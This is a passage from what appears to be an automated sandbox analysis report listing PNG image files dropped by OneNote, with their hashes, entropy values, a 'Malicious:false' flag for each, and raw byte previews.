                                                                                                                                                                                                                  Preview:.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....*JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.*>.E,;.....~..|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&...........*.Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......*>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D|3t.-\g...Q
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2270
                                                                                                                                                                                                                  Entropy (8bit):7.845368393313232
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                                                                                                                                  MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                                                                                                                                  SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                                                                                                                                  SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                                                                                                                                  SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W...*.F......@.*.(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!*.&E.....n...=.@..Sp.GF..c*....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~l*k.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N*..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13241
                                                                                                                                                                                                                  Entropy (8bit):7.931391290415517
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                                                                                                                                  MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                                                                                                                                  SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                                                                                                                                  SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                                                                                                                                  SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......*EX........wo9..9.|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~.*.U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J*.w.mdv.&*..@....R..o/.^..5...x.g.>..ag....GM|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13737
                                                                                                                                                                                                                  Entropy (8bit):7.916899917415529
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                                                                                                                                  MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                                                                                                                                  SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                                                                                                                                  SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                                                                                                                                  SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1570
                                                                                                                                                                                                                  Entropy (8bit):7.780157858994452
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                                                                                                                                  MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                                                                                                                                  SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                                                                                                                                  SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                                                                                                                                  SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....*JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.*>.E,;.....~..|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&...........*.Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......*>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D|3t.-\g...Q
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):22634
                                                                                                                                                                                                                  Entropy (8bit):7.974332204835705
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                                                                                                                                  MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                                                                                                                                  SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                                                                                                                                  SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                                                                                                                                  SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25*.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../|.O........7_...Oj....|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.|..kv....];j|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9|.m.+`).|......x..vak-].../.....G'....4.>B6$.......-o.q..L;*.N+....>...=.!.Y..Q...?......7..,....}
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1657
                                                                                                                                                                                                                  Entropy (8bit):7.80882577056055
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                                                                                                                                  MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                                                                                                                                  SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                                                                                                                                  SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                                                                                                                                  SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):19235
                                                                                                                                                                                                                  Entropy (8bit):7.944867159042578
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                                                                                                                                  MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                                                                                                                                  SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                                                                                                                                  SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                                                                                                                                  SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):3679
                                                                                                                                                                                                                  Entropy (8bit):7.931319059366604
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                                                                                                                                  MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                                                                                                                                  SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                                                                                                                                  SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                                                                                                                                  SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2332
                                                                                                                                                                                                                  Entropy (8bit):7.8822150338370776
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                                                                                                                                  MD5:91CB7F1273AA003076401081B8A22237
                                                                                                                                                                                                                  SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                                                                                                                                  SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                                                                                                                                  SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2232
                                                                                                                                                                                                                  Entropy (8bit):7.837610270261933
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                                                                                                                                  MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                                                                                                                                  SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                                                                                                                                  SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                                                                                                                                  SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13030
                                                                                                                                                                                                                  Entropy (8bit):7.948664903731204
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                                                                                                                                  MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                                                                                                                                  SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                                                                                                                                  SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                                                                                                                                  SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):7374
                                                                                                                                                                                                                  Entropy (8bit):7.955141875077912
                                                                                                                                                                                                                  Encrypted:false
